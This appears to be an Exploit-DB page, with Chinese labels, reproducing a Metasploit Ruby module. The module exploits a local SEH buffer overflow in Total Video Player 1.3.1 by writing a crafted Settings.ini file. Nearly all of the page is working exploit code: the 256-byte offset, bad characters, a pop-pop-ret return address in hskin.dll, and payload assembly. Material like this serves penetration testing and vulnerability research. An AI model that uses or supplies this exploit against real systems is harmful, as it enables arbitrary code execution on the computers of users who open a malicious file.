Total Video Player 1.3.1 – ‘Settings.ini’ Local Buffer Overflow (SEH) (Metasploit)

  • 作者: Metasploit
    日期: 2014-02-28
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/31988/
  • ##
    # This module requires Metasploit: http://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    require 'msf/core'
    
    class Metasploit3 < Msf::Exploit::Remote
    Rank = NormalRanking
    
    include Msf::Exploit::FILEFORMAT
    include Msf::Exploit::Seh
    
    def initialize(info = {})
    super(update_info(info,
    'Name'=> 'Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow',
    'Description'=> %q{
    This module exploits a buffer overflow in Total Video Player 1.3.1. The vulnerability
    occurs opening malformed Settings.ini file e.g."C:\Program Files\Total Video Player\".
    This module has been tested successfully over Windows WinXp-Sp3-EN, Windows 7, Windows 8.
    },
    'License'=> MSF_LICENSE,
    'Author'=>
    [
    'Mike Czumak', # (T_v3rn1x) -- @SecuritySift 
    'Fr330wn4g3 <Fr330wn4g3[at]gmail.com>' # Metasploit module
    ],
    'References'=>
    [
    [ 'OSVDB', '100619' ],
    [ 'EDB', '29799' ]
    ],
    'DefaultOptions' =>
    {
    'ExitFunction' => 'process',
    },
    'Platform'=> 'win',
    'Payload'=>
    {
    'BadChars' => "\x00\x0a\x0d\xff",
    'Space' => 1787,
    'DisableNops' => true,
    },
    
    'Targets'=>
    [
    [ 'Windows Universal',
    {
    'Ret' =>0x10012848, # pop ebx # pop ecx # ret- hskin.dll
    'Offset'=>256
    }
    ],
    ],
    'Privileged'=> false,
    'DisclosureDate'=> 'Nov 24 2013',
    'DefaultTarget'=> 0))
    
    register_options([OptString.new('FILENAME', [ false, 'The file name.', 'Settings.ini']),], self.class)
    
    end
    
    def exploit
    
    buffer = "[Support Groups]\r\nVideo="
    buffer << rand_text(target['Offset'])
    buffer << generate_seh_payload(target.ret)
    buffer << payload.encoded 
    buffer << "\r\n[AssociateType]\r\nAssociateType =1"
    
    file_create(buffer)
    
    end
    end